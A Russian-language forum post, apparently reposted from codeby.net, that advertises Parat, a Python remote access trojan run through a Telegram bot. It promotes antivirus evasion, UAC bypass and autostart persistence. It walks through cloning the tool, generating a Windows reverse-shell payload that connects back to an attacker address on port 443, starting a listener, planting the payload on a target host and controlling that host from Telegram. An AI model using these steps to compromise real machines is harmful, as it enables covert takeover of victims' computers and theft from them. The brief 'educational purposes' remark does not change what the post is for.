Parat - Python RAT (Telegram)

t.me/webware

Приветствую, уважаемую аудиторию форума! На этот раз я бы хотел вам представить, на мой взгляд, очень неплохую утилиту для удаленного управления целевым хостом, иными словами RAT, под названием Parat.

Parat - это инструмент для удаленного администрирования с открытым исходным кодом, он является многопоточным и написан полностью на Python. В основном, использует Python в ядре, для шифрования и обеспечения максимальной приватности.

Протокол версии IPv4 используется для коммуникации.

Особенности Parat:

• Полностью UnDetectable (FUD)
• Совместимость с Telegram messanger
• Обход контроля учётных записей пользователей (User Account Control, UAC)
• Выполнение в памяти
• Никаких требований по настройке

Установка (Kali Linux 2018.1):

git clone https://github.com/micle-fm/Parat

Использование:

Parat – использует два режима:

• Локальный режим
• Удаленный режим

Локальный режим:

Запуск Parat на своем хосте со списком доступных функций:

• cd Parat
• chmod +x main.py

• Контроль локальных параметров
• Смена параметров пользовательского интерфейса
• Внесение изменений
• Использование своей UNIX – оболочки
• Настройка прослушивающихся портов
• Генерация полезных нагрузок

К тому же, не следует забывать, что некоторые локальные команды доступны в удаленном режиме.

Удаленный режим:

• Удаленным режимом - называется режим взаимодействия вашего хоста с целевым, где на данный момент выполняется ваша полезная нагрузка. С помощью идентификатора сессий, вы подключаетесь к нужной, и получаете полный контроль над целевым хостом.

Шифрование:

Вы можете установить локальный пароль для клиента parat и удаленных подключений, используя алгоритм самошифрования (который реализует очень простые побитовые трюки) автоматически.

Многопоточность:

Хотя у нас есть разные и более эффективные варианты обработки многопоточности, но в итоге мы решили использовать модуль одно потоковой передачи для Parat. Причина этого выбора в том, что parat - простой инструмент и предназначен только для образовательных целей.

Генерируем полезную нагрузку:

generate –i 192.168.125.140 –p 443 --platform windows --arch x64 –o shell –d /root

Теперь копируем ее на целевой хост и запускаем:

На атакующем хосте вводим команду listen 443, тут мы будем ждать входящего соединения:

После запуска полезной нагрузки у нас открывается активная сессия с целевым хостом.

Вот список доступных команд, для открывшегося шелла:

Мною были проверены все команды на Windows 8.1 Full Update – все работает корректно.

• Хочу уточнить, что на целевом хосте должен быть установлен Python 2.x

Сама полезная нагрузка, не теряя времени, прописывается в автозагрузку при первом запуске.

В заголовке темы присутствует слово Telegram, и не просто так. Попробуем осуществить управление сервером с помощью телеграм бота.

Открываем файл – telegram.service и вписываем API своего бота:

nano /Pentest/Parat/telegram.service

Сохраняем и запускаем командой:

python telegram.service

По сути, большого преимущества это не дает, так как команд немного, одна из полезных, на мой взгляд, это генерация полезной нагрузки, и скачивание ее себе на устройство.

Ниже список команд, поддерживаемых в telegram:

На этом все, спасибо за внимание.

Источник codeby.net